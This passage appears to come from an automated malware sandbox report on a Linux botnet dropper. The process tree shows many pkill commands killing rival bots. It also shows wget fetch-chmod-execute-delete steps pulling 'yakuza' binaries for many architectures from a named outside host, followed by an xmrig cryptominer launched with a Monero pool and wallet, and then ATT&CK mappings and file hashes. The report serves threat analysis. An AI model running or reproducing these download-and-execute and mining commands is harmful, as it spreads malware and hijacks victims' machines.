    sh -c "pkill -9 5Gbf || busybox pkill -9 5Gbf"
    3⤵
    PID:1091
  - - /usr/bin/pkill
      pkill -9 5Gbf
      4⤵
      Reads runtime system information
      PID:1092
  - - /bin/busybox
      busybox pkill -9 5Gbf
      4⤵
      PID:1093
- - /bin/sh
    sh -c "pkill -9 SoRAxD123LOL || busybox pkill -9 SoRAxD123LOL"
    3⤵
    PID:1094
  - - /usr/bin/pkill
      pkill -9 SoRAxD123LOL
      4⤵
      Reads runtime system information
      PID:1095
  - - /bin/busybox
      busybox pkill -9 SoRAxD123LOL
      4⤵
      PID:1096
- - /bin/sh
    sh -c "pkill -9 iaGv || busybox pkill -9 iaGv"
    3⤵
    PID:1097
  - - /usr/bin/pkill
      pkill -9 iaGv
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:1098
  - - /bin/busybox
      busybox pkill -9 iaGv
      4⤵
      PID:1099
- - /bin/sh
    sh -c "pkill -9 5aA3 || busybox pkill -9 5aA3"
    3⤵
    PID:1100
  - - /usr/bin/pkill
      pkill -9 5aA3
      4⤵
      Reads runtime system information
      PID:1101
  - - /bin/busybox
      busybox pkill -9 5aA3
      4⤵
      PID:1102
- - /bin/sh
    sh -c "pkill -9 SoRAxD420LOL || busybox pkill -9 SoRAxD420LOL"
    3⤵
    PID:1103
  - - /usr/bin/pkill
      pkill -9 SoRAxD420LOL
      4⤵
      PID:1104
  - - /bin/busybox
      busybox pkill -9 SoRAxD420LOL
      4⤵
      PID:1105
- - /bin/sh
    sh -c "pkill -9 insomni || busybox pkill -9 insomni"
    3⤵
    PID:1106
  - - /usr/bin/pkill
      pkill -9 insomni
      4⤵
      PID:1107
  - - /bin/busybox
      busybox pkill -9 insomni
      4⤵
      PID:1108
- - /bin/sh
    sh -c "pkill -9 640277 || busybox pkill -9 640277"
    3⤵
    PID:1109
  - - /usr/bin/pkill
      pkill -9 640277
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:1110
  - - /bin/busybox
      busybox pkill -9 640277
      4⤵
      PID:1111
- - /bin/sh
    sh -c "pkill -9 SoraBeReppin1337 || busybox pkill -9 SoraBeReppin1337"
    3⤵
    PID:1112
  - - /usr/bin/pkill
      pkill -9 SoraBeReppin1337
      4⤵
      Reads CPU attributes
      PID:1113
  - - /bin/busybox
      busybox pkill -9 SoraBeReppin1337
      4⤵
      PID:1114
- - /bin/sh
    sh -c "pkill -9 ipcamCache || busybox pkill -9 ipcamCache"
    3⤵
    - System Network Configuration Discovery
    PID:1115
  - - /usr/bin/pkill
      pkill -9 ipcamCache
      4⤵
      Reads CPU attributes
      System Network Configuration Discovery
      PID:1116
  - - /bin/busybox
      busybox pkill -9 ipcamCache
      4⤵
      System Network Configuration Discovery
      PID:1117
- - /bin/sh
    sh -c "pkill -9 66tlGg9Q || busybox pkill -9 66tlGg9Q"
    3⤵
    PID:1118
  - - /usr/bin/pkill
      pkill -9 66tlGg9Q
      4⤵
      PID:1119
  - - /bin/busybox
      busybox pkill -9 66tlGg9Q
      4⤵
      PID:1120
- - /bin/sh
    sh -c "pkill -9 T || busybox pkill -9 T"
    3⤵
    PID:1121
  - - /usr/bin/pkill
      pkill -9 T
      4⤵
      PID:1122
  - - /bin/busybox
      busybox pkill -9 T
      4⤵
      PID:1123
- - /bin/sh
    sh -c "pkill -9 jUYfouyf87 || busybox pkill -9 jUYfouyf87"
    3⤵
    PID:1124
  - - /usr/bin/pkill
      pkill -9 jUYfouyf87
      4⤵
      Reads CPU attributes
      PID:1125
  - - /bin/busybox
      busybox pkill -9 jUYfouyf87
      4⤵
      PID:1126
- - /bin/sh
    sh -c "pkill -9 6ke3 || busybox pkill -9 6ke3"
    3⤵
    PID:1127
  - - /usr/bin/pkill
      pkill -9 6ke3
      4⤵
      Reads CPU attributes
      PID:1128
  - - /bin/busybox
      busybox pkill -9 6ke3
      4⤵
      PID:1129
- - /bin/sh
    sh -c "pkill -9 TOKYO3 || busybox pkill -9 TOKYO3"
    3⤵
    PID:1130
  - - /usr/bin/pkill
      pkill -9 TOKYO3
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:1131
  - - /bin/busybox
      busybox pkill -9 TOKYO3
      4⤵
      PID:1132
- - /bin/sh
    sh -c "pkill -9 lyEeaXul2dULCVxh || busybox pkill -9 lyEeaXul2dULCVxh"
    3⤵
    PID:1133
  - - /usr/bin/pkill
      pkill -9 lyEeaXul2dULCVxh
      4⤵
      Reads CPU attributes
      PID:1134
  - - /bin/busybox
      busybox pkill -9 lyEeaXul2dULCVxh
      4⤵
      PID:1135
- - /bin/sh
    sh -c "pkill -9 93OfjHZ2z || busybox pkill -9 93OfjHZ2z"
    3⤵
    PID:1136
  - - /usr/bin/pkill
      pkill -9 93OfjHZ2z
      4⤵
      Reads runtime system information
      PID:1137
  - - /bin/busybox
      busybox pkill -9 93OfjHZ2z
      4⤵
      PID:1138
- - /bin/sh
    sh -c "pkill -9 TY2gD6MZvKc7KU6r || busybox pkill -9 TY2gD6MZvKc7KU6r"
    3⤵
    PID:1139
  - - /usr/bin/pkill
      pkill -9 TY2gD6MZvKc7KU6r
      4⤵
      Reads CPU attributes
      PID:1140
  - - /bin/busybox
      busybox pkill -9 TY2gD6MZvKc7KU6r
      4⤵
      PID:1141
- - /bin/sh
    sh -c "pkill -9 mMkiy6f87l || busybox pkill -9 mMkiy6f87l"
    3⤵
    PID:1142
  - - /usr/bin/pkill
      pkill -9 mMkiy6f87l
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:1143
  - - /bin/busybox
      busybox pkill -9 mMkiy6f87l
      4⤵
      PID:1144
- - /bin/sh
    sh -c "pkill -9 A023UU4U24UIU || busybox pkill -9 A023UU4U24UIU"
    3⤵
    PID:1145
  - - /usr/bin/pkill
      pkill -9 A023UU4U24UIU
      4⤵
      Reads CPU attributes
      PID:1146
  - - /bin/busybox
      busybox pkill -9 A023UU4U24UIU
      4⤵
      PID:1147
- - /bin/sh
    sh -c "pkill -9 TheWeeknd || busybox pkill -9 TheWeeknd"
    3⤵
    PID:1148
  - - /usr/bin/pkill
      pkill -9 TheWeeknd
      4⤵
      PID:1149
  - - /bin/busybox
      busybox pkill -9 TheWeeknd
      4⤵
      PID:1150
- - /bin/sh
    sh -c "pkill -9 mioribitches || busybox pkill -9 mioribitches"
    3⤵
    PID:1151
  - - /usr/bin/pkill
      pkill -9 mioribitches
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:1152
  - - /bin/busybox
      busybox pkill -9 mioribitches
      4⤵
      PID:1153
- - /bin/sh
    sh -c "pkill -9 A5p9 || busybox pkill -9 A5p9"
    3⤵
    PID:1154
  - - /usr/bin/pkill
      pkill -9 A5p9
      4⤵
      PID:1155
  - - /bin/busybox
      busybox pkill -9 A5p9
      4⤵
      PID:1156
- - /bin/sh
    sh -c "pkill -9 TheWeeknds || busybox pkill -9 TheWeeknds"
    3⤵
    PID:1157
  - - /usr/bin/pkill
      pkill -9 TheWeeknds
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:1158
  - - /bin/busybox
      busybox pkill -9 TheWeeknds
      4⤵
      PID:1159
- - /bin/sh
    sh -c "pkill -9 mnblkjpoi || busybox pkill -9 mnblkjpoi"
    3⤵
    PID:1160
  - - /usr/bin/pkill
      pkill -9 mnblkjpoi
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:1161
  - - /bin/busybox
      busybox pkill -9 mnblkjpoi
      4⤵
      PID:1162
- - /bin/sh
    sh -c "pkill -9 AbAd || busybox pkill -9 AbAd"
    3⤵
    PID:1163
  - - /usr/bin/pkill
      pkill -9 AbAd
      4⤵
      Reads runtime system information
      PID:1164
  - - /bin/busybox
      busybox pkill -9 AbAd
      4⤵
      PID:1165
- - /bin/sh
    sh -c "pkill -9 Tokyos || busybox pkill -9 Tokyos"
    3⤵
    PID:1166
  - - /usr/bin/pkill
      pkill -9 Tokyos
      4⤵
      PID:1167
  - - /bin/busybox
      busybox pkill -9 Tokyos
      4⤵
      PID:1168
- - /bin/sh
    sh -c "pkill -9 neb || busybox pkill -9 neb"
    3⤵
    PID:1169
  - - /usr/bin/pkill
      pkill -9 neb
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:1170
  - - /bin/busybox
      busybox pkill -9 neb
      4⤵
      PID:1171
- - /bin/sh
    sh -c "pkill -9 Akiru || busybox pkill -9 Akiru"
    3⤵
    PID:1172
  - - /usr/bin/pkill
      pkill -9 Akiru
      4⤵
      Reads CPU attributes
      PID:1173
  - - /bin/busybox
      busybox pkill -9 Akiru
      4⤵
      PID:1174
- - /bin/sh
    sh -c "pkill -9 U8inTz || busybox pkill -9 U8inTz"
    3⤵
    PID:1175
  - - /usr/bin/pkill
      pkill -9 U8inTz
      4⤵
      Reads runtime system information
      PID:1176
  - - /bin/busybox
      busybox pkill -9 U8inTz
      4⤵
      PID:1177
- - /bin/sh
    sh -c "pkill -9 netstats || busybox pkill -9 netstats"
    3⤵
    PID:1178
  - - /usr/bin/pkill
      pkill -9 netstats
      4⤵
      PID:1179
  - - /bin/busybox
      busybox pkill -9 netstats
      4⤵
      PID:1180
- - /bin/sh
    sh -c "pkill -9 Alex || busybox pkill -9 Alex"
    3⤵
    PID:1181
  - - /usr/bin/pkill
      pkill -9 Alex
      4⤵
      Reads CPU attributes
      PID:1182
  - - /bin/busybox
      busybox pkill -9 Alex
      4⤵
      PID:1183
- - /bin/sh
    sh -c "pkill -9 W9RCAKM20T || busybox pkill -9 W9RCAKM20T"
    3⤵
    PID:1184
  - - /usr/bin/pkill
      pkill -9 W9RCAKM20T
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:1185
  - - /bin/busybox
      busybox pkill -9 W9RCAKM20T
      4⤵
      PID:1186
- - /bin/sh
    sh -c "pkill -9 newnetword || busybox pkill -9 newnetword"
    3⤵
    PID:1187
  - - /usr/bin/pkill
      pkill -9 newnetword
      4⤵
      Reads runtime system information
      PID:1188
  - - /bin/busybox
      busybox pkill -9 newnetword
      4⤵
      PID:1189
- - /bin/sh
    sh -c "pkill -9 Ayo215 || busybox pkill -9 Ayo215"
    3⤵
    PID:1190
  - - /usr/bin/pkill
      pkill -9 Ayo215
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:1191
  - - /bin/busybox
      busybox pkill -9 Ayo215
      4⤵
      PID:1192
- - /bin/sh
    sh -c "pkill -9 Word || busybox pkill -9 Word"
    3⤵
    PID:1193
  - - /usr/bin/pkill
      pkill -9 Word
      4⤵
      PID:1194
  - - /bin/busybox
      busybox pkill -9 Word
      4⤵
      PID:1195
- - /bin/sh
    sh -c "pkill -9 nloads || busybox pkill -9 nloads"
    3⤵
    PID:1196
  - - /usr/bin/pkill
      pkill -9 nloads
      4⤵
      PID:1197
  - - /bin/busybox
      busybox pkill -9 nloads
      4⤵
      PID:1198
- - /bin/sh
    sh -c "pkill -9 BAdAsV || busybox pkill -9 BAdAsV"
    3⤵
    PID:1199
  - - /usr/bin/pkill
      pkill -9 BAdAsV
      4⤵
      Reads CPU attributes
      PID:1200
  - - /bin/busybox
      busybox pkill -9 BAdAsV
      4⤵
      PID:1201
- - /bin/sh
    sh -c "pkill -9 Wordmane || busybox pkill -9 Wordmane"
    3⤵
    PID:1202
  - - /usr/bin/pkill
      pkill -9 Wordmane
      4⤵
      Reads runtime system information
      PID:1203
  - - /bin/busybox
      busybox pkill -9 Wordmane
      4⤵
      PID:1204
- - /bin/sh
    sh -c "pkill -9 notyakuzaa || busybox pkill -9 notyakuzaa"
    3⤵
    PID:1205
  - - /usr/bin/pkill
      pkill -9 notyakuzaa
      4⤵
      Reads CPU attributes
      PID:1206
  - - /bin/busybox
      busybox pkill -9 notyakuzaa
      4⤵
      PID:1207
- - /bin/sh
    sh -c "pkill -9 Belch || busybox pkill -9 Belch"
    3⤵
    PID:1208
  - - /usr/bin/pkill
      pkill -9 Belch
      4⤵
      PID:1209
  - - /bin/busybox
      busybox pkill -9 Belch
      4⤵
      PID:1210
- - /bin/sh
    sh -c "pkill -9 Wordnets || busybox pkill -9 Wordnets"
    3⤵
    PID:1211
  - - /usr/bin/pkill
      pkill -9 Wordnets
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:1212
  - - /bin/busybox
      busybox pkill -9 Wordnets
      4⤵
      PID:1213
- - /bin/sh
    sh -c "pkill -9 obp || busybox pkill -9 obp"
    3⤵
    PID:1214
  - - /usr/bin/pkill
      pkill -9 obp
      4⤵
      Reads runtime system information
      PID:1215
  - - /bin/busybox
      busybox pkill -9 obp
      4⤵
      PID:1216
- - /bin/sh
    sh -c "pkill -9 BigN0gg0r420 || busybox pkill -9 BigN0gg0r420"
    3⤵
    PID:1217
  - - /usr/bin/pkill
      pkill -9 BigN0gg0r420
      4⤵
      Reads CPU attributes
      PID:1218
  - - /bin/busybox
      busybox pkill -9 BigN0gg0r420
      4⤵
      PID:1219
- - /bin/sh
    sh -c "pkill -9 X0102I34f || busybox pkill -9 X0102I34f"
    3⤵
    PID:1220
  - - /usr/bin/pkill
      pkill -9 X0102I34f
      4⤵
      Reads CPU attributes
      PID:1221
  - - /bin/busybox
      busybox pkill -9 X0102I34f
      4⤵
      PID:1222
- - /bin/sh
    sh -c "pkill -9 ofhasfhiafhoi || busybox pkill -9 ofhasfhiafhoi"
    3⤵
    PID:1223
  - - /usr/bin/pkill
      pkill -9 ofhasfhiafhoi
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:1224
  - - /bin/busybox
      busybox pkill -9 ofhasfhiafhoi
      4⤵
      PID:1225
- - /bin/sh
    sh -c "pkill -9 BzSxLxBxeY || busybox pkill -9 BzSxLxBxeY"
    3⤵
    PID:1226
  - - /usr/bin/pkill
      pkill -9 BzSxLxBxeY
      4⤵
      Reads CPU attributes
      PID:1227
  - - /bin/busybox
      busybox pkill -9 BzSxLxBxeY
      4⤵
      PID:1228
- - /bin/sh
    sh -c "pkill -9 X19I239124UIU || busybox pkill -9 X19I239124UIU"
    3⤵
    PID:1229
  - - /usr/bin/pkill
      pkill -9 X19I239124UIU
      4⤵
      PID:1230
  - - /bin/busybox
      busybox pkill -9 X19I239124UIU
      4⤵
      PID:1231
- - /bin/sh
    sh -c "pkill -9 oism || busybox pkill -9 oism"
    3⤵
    PID:1232
  - - /usr/bin/pkill
      pkill -9 oism
      4⤵
      Reads CPU attributes
      PID:1233
  - - /bin/busybox
      busybox pkill -9 oism
      4⤵
      PID:1234
- - /bin/sh
    sh -c "pkill -9 Deported || busybox pkill -9 Deported"
    3⤵
    PID:1235
  - - /usr/bin/pkill
      pkill -9 Deported
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:1236
  - - /bin/busybox
      busybox pkill -9 Deported
      4⤵
      PID:1237
- - /bin/sh
    sh -c "pkill -9 XSHJEHHEIIHWO || busybox pkill -9 XSHJEHHEIIHWO"
    3⤵
    PID:1238
  - - /usr/bin/pkill
      pkill -9 XSHJEHHEIIHWO
      4⤵
      PID:1239
  - - /bin/busybox
      busybox pkill -9 XSHJEHHEIIHWO
      4⤵
      PID:1240
- - /bin/sh
    sh -c "pkill -9 olsVNwo12 || busybox pkill -9 olsVNwo12"
    3⤵
    PID:1241
  - - /usr/bin/pkill
      pkill -9 olsVNwo12
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:1242
  - - /bin/busybox
      busybox pkill -9 olsVNwo12
      4⤵
      PID:1243
- - /bin/sh
    sh -c "pkill -9 DeportedDeported || busybox pkill -9 DeportedDeported"
    3⤵
    PID:1244
  - - /usr/bin/pkill
      pkill -9 DeportedDeported
      4⤵
      Reads CPU attributes
      PID:1245
  - - /bin/busybox
      busybox pkill -9 DeportedDeported
      4⤵
      PID:1246
- - /bin/sh
    sh -c "pkill -9 XkTer0GbA1 || busybox pkill -9 XkTer0GbA1"
    3⤵
    PID:1247
  - - /usr/bin/pkill
      pkill -9 XkTer0GbA1
      4⤵
      Reads CPU attributes
      PID:1248
  - - /bin/busybox
      busybox pkill -9 XkTer0GbA1
      4⤵
      PID:1249
- - /bin/sh
    sh -c "pkill -9 onry0v03 || busybox pkill -9 onry0v03"
    3⤵
    PID:1250
  - - /usr/bin/pkill
      pkill -9 onry0v03
      4⤵
      PID:1251
  - - /bin/busybox
      busybox pkill -9 onry0v03
      4⤵
      PID:1252
- - /bin/sh
    sh -c "pkill -9 FortniteDownLOLZ || busybox pkill -9 FortniteDownLOLZ"
    3⤵
    PID:1253
  - - /usr/bin/pkill
      pkill -9 FortniteDownLOLZ
      4⤵
      Reads CPU attributes
      PID:1254
  - - /bin/busybox
      busybox pkill -9 FortniteDownLOLZ
      4⤵
      PID:1255
- - /bin/sh
    sh -c "pkill -9 Y0urM0mGay || busybox pkill -9 Y0urM0mGay"
    3⤵
    PID:1256
  - - /usr/bin/pkill
      pkill -9 Y0urM0mGay
      4⤵
      Reads runtime system information
      PID:1257
  - - /bin/busybox
      busybox pkill -9 Y0urM0mGay
      4⤵
      PID:1258
- /bin/rm
  rm -rf yakuza.mips
  2⤵
  - System Network Configuration Discovery
  PID:740
- /usr/bin/wget
  wget http://linux-it.abuser.eu/yakuza.mipsel
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:745
- /bin/chmod
  chmod +x yakuza.mipsel
  2⤵
  - File and Directory Permissions Modification
  PID:750
- /tmp/yakuza.mipsel
  ./yakuza.mipsel
  2⤵
  - System Network Configuration Discovery
  PID:751
- /bin/rm
  rm -rf yakuza.mipsel
  2⤵
  - System Network Configuration Discovery
  PID:755
- /usr/bin/wget
  wget http://linux-it.abuser.eu/yakuza.sh
  2⤵
  - Writes file to tmp directory
  PID:756
- /bin/chmod
  chmod +x yakuza.sh
  2⤵
  - File and Directory Permissions Modification
  PID:765
- /tmp/yakuza.sh
  ./yakuza.sh
  2⤵
  PID:767
- /bin/rm
  rm -rf yakuza.sh
  2⤵
  PID:770
- /usr/bin/wget
  wget http://linux-it.abuser.eu/yakuza.x86
  2⤵
  - Writes file to tmp directory
  PID:771
- /bin/chmod
  chmod +x yakuza.x86
  2⤵
  - File and Directory Permissions Modification
  PID:786
- /tmp/yakuza.x86
  ./yakuza.x86
  2⤵
  PID:788
- /bin/rm
  rm -rf yakuza.x86
  2⤵
  PID:792
- /usr/bin/wget
  wget http://linux-it.abuser.eu/yakuza.arm6
  2⤵
  - Writes file to tmp directory
  PID:794
- /bin/chmod
  chmod +x yakuza.arm6
  2⤵
  - File and Directory Permissions Modification
  PID:814
- /tmp/yakuza.arm6
  ./yakuza.arm6
  2⤵
  PID:815
- /bin/rm
  rm -rf yakuza.arm6
  2⤵
  PID:821
- /usr/bin/wget
  wget http://linux-it.abuser.eu/yakuza.i686
  2⤵
  - Writes file to tmp directory
  PID:823
- /bin/chmod
  chmod +x yakuza.i686
  2⤵
  - File and Directory Permissions Modification
  PID:842
- /tmp/yakuza.i686
  ./yakuza.i686
  2⤵
  PID:843
- /bin/rm
  rm -rf yakuza.i686
  2⤵
  PID:847
- /usr/bin/wget
  wget http://linux-it.abuser.eu/yakuza.ppc
  2⤵
  - Writes file to tmp directory
  PID:848
- /bin/chmod
  chmod +x yakuza.ppc
  2⤵
  - File and Directory Permissions Modification
  PID:856
- /tmp/yakuza.ppc
  ./yakuza.ppc
  2⤵
  PID:857
- /bin/rm
  rm -rf yakuza.ppc
  2⤵
  PID:859
- /usr/bin/wget
  wget http://linux-it.abuser.eu/yakuza.i586
  2⤵
  - Writes file to tmp directory
  PID:860
- /bin/chmod
  chmod +x yakuza.i586
  2⤵
  - File and Directory Permissions Modification
  PID:866
- /tmp/yakuza.i586
  ./yakuza.i586
  2⤵
  PID:867
- /bin/rm
  rm -rf yakuza.i586
  2⤵
  PID:870
- /usr/bin/wget
  wget http://linux-it.abuser.eu/yakuza.m68k
  2⤵
  - Writes file to tmp directory
  PID:871
- /bin/chmod
  chmod +x yakuza.m68k
  2⤵
  - File and Directory Permissions Modification
  PID:879
- /tmp/yakuza.m68k
  ./yakuza.m68k
  2⤵
  PID:881
- /bin/rm
  rm -rf yakuza.m68k
  2⤵
  PID:886
- /usr/bin/wget
  wget http://linux-it.abuser.eu/yakuza.arm4
  2⤵
  - Writes file to tmp directory
  PID:890
- /bin/chmod
  chmod +x yakuza.arm4
  2⤵
  - File and Directory Permissions Modification
  PID:905
- /tmp/yakuza.arm4
  ./yakuza.arm4
  2⤵
  PID:906
- /bin/rm
  rm -rf yakuza.arm4
  2⤵
  PID:910
- /usr/bin/wget
  wget http://linux-it.abuser.eu/yakuza.arm5
  2⤵
  - Writes file to tmp directory
  PID:911
- /bin/chmod
  chmod +x yakuza.arm5
  2⤵
  - File and Directory Permissions Modification
  PID:928
- /tmp/yakuza.arm5
  ./yakuza.arm5
  2⤵
  PID:929
- /bin/rm
  rm -rf yakuza.arm5
  2⤵
  PID:932
- /usr/bin/wget
  wget http://linux-it.abuser.eu/yakuza.arm7
  2⤵
  - Writes file to tmp directory
  PID:934
- /bin/chmod
  chmod +x yakuza.arm7
  2⤵
  - File and Directory Permissions Modification
  PID:941
- /tmp/yakuza.arm7
  ./yakuza.arm7
  2⤵
  PID:942
- /bin/rm
  rm -rf yakuza.arm7
  2⤵
  PID:944
- /usr/bin/wget
  wget http://linux-it.abuser.eu/yakuza.sparc
  2⤵
  - Writes file to tmp directory
  PID:945
- /bin/chmod
  chmod +x yakuza.sparc
  2⤵
  - File and Directory Permissions Modification
  PID:952
- /tmp/yakuza.sparc
  ./yakuza.sparc
  2⤵
  PID:953
- /bin/rm
  rm -rf yakuza.sparc
  2⤵
  PID:955
- /bin/bash
  bash
  2⤵
  PID:957
- - /bin/grep
    grep xmrig
    3⤵
    PID:960
- - /bin/grep
    grep -v grep
    3⤵
    PID:961
- - /bin/ps
    ps x
    3⤵
    - Reads CPU attributes
    PID:959
- - /bin/grep
    grep 45RjcttikAkHAhhBZiLKCZFasC98mrfJ2aJkZasQgr4hUwYkB2QPWqUZnxDuwBVjveT59ZbF2xdmVDQQYdU8EQdhVaJ7amW
    3⤵
    PID:962
- - /usr/bin/curl
    curl -O ftp://linux-it.abuser.eu/xmrig-lnx/xmrig
    3⤵
    - Writes file to tmp directory
    PID:966
- - /bin/chmod
    chmod +x xmrig
    3⤵
    - File and Directory Permissions Modification
    PID:995
- /usr/bin/curl
  curl -s http://linux-it.abuser.eu/test.php
  2⤵
  PID:956

/usr/bin/nohup
nohup ./xmrig --url gulf.moneroocean.stream:443 --user 45RjcttikAkHAhhBZiLKCZFasC98mrfJ2aJkZasQgr4hUwYkB2QPWqUZnxDuwBVjveT59ZbF2xdmVDQQYdU8EQdhVaJ7amW --pass worker652 --tls "--cpu-priority=3" "--asm=auto"
1⤵
PID:996

/tmp/xmrig
./xmrig --url gulf.moneroocean.stream:443 --user 45RjcttikAkHAhhBZiLKCZFasC98mrfJ2aJkZasQgr4hUwYkB2QPWqUZnxDuwBVjveT59ZbF2xdmVDQQYdU8EQdhVaJ7amW --pass worker652 --tls "--cpu-priority=3" "--asm=auto"
1⤵
- Executes dropped EXE
PID:996

/bin/sh
/bin/sh ./xmrig --url gulf.moneroocean.stream:443 --user 45RjcttikAkHAhhBZiLKCZFasC98mrfJ2aJkZasQgr4hUwYkB2QPWqUZnxDuwBVjveT59ZbF2xdmVDQQYdU8EQdhVaJ7amW --pass worker652 --tls "--cpu-priority=3" "--asm=auto"
1⤵
- Writes file to tmp directory
PID:996

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/xmrig

Filesize
7.9MB

MD5
8f4fff0ded94f1141768220906abfbb8

SHA1
ea7c97294f415dc8713ac8c280b3123da62f6e56

SHA256
b0e1ae6d73d656b203514f498b59cbcf29f067edf6fbd3803a3de7d21960848d

SHA512
0096072a1482f8e7999867baa3dd6e96d51591e9f7645c9ff276b53984957025c83e1fe52e5c4f55639eeed2bdbd80bbd57d7dacd84468ce09c834e39dfc4bee

Download Submit
/tmp/yakuza.mips

Filesize
183KB

MD5
371732a722f576ce663cf832412521a8

SHA1
7d8f25bfc26af545c568ffc5c0afe8c4cd35de40

SHA256
11bd15eeca11f8fcb46cce41f4387505027446b5ba8774d2b7bd759bcdb1b9d0

SHA512
c2174eeaf058a5d78d2bb7e417373c56d5b407072de68aaae33c690fd14b93a033ef4aeb18f9a364541e51b6cfc0a28c93efbb4a1857a15b875d420e9886c014

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads